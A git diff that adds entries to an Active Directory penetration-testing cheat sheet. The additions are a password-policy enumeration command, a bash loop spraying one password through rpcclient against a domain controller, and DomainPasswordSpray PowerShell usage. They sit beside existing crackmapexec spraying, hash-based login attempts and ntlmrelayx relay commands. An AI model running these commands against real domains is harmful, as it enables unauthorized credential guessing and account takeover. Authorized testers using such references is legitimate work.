diff --git a/ad/Readme.md b/ad/Readme.md
index daab232..4455545 100644
--- a/ad/Readme.md
+++ b/ad/Readme.md
@@ -230,6 +230,12 @@ python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "p
 python windapsearch -d [domain name] --dc-ip [dc-ip] -u "domain\\username" -p "password" --unconstrained-computers | tee unconstrained-computers-enumeration
 ```
 
+#### Get password policy
+
+```
+python3 enum4linux-ng.py -P [dc-ip] -oA /tmp/wtf
+```
+
 ---
 
 #### Find smb not signed
@@ -300,6 +306,10 @@ python ntlmrelayx.py -6 -wh [domain name] -tf mytargets.txt -smb2support  --http
 
 #### Password spraying
 
+```
+for i in $(cat valid-users.txt);do rpcclient -U "$i%PASSWORDTOSPRAY" -c "getusername;quit" [dc-ip] | grep Authority ;done 
+```
+
 ```
 crackmapexec smb [dc-ip] --pass-pol -u '' -p ''
 ```
@@ -330,6 +340,13 @@ crackmapexec smb [ip-range] -u usernames.txt -p passwords.txt --no-bruteforce
 crackmapexec smb [ip-range] -H hashes.txt --no-bruteforce
 ```
 
+##### using windows
+
+```
+Import-Module .\DomainPasswordSpray.ps1
+Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
+```
+
 ---
 
 #### Password bruteforcing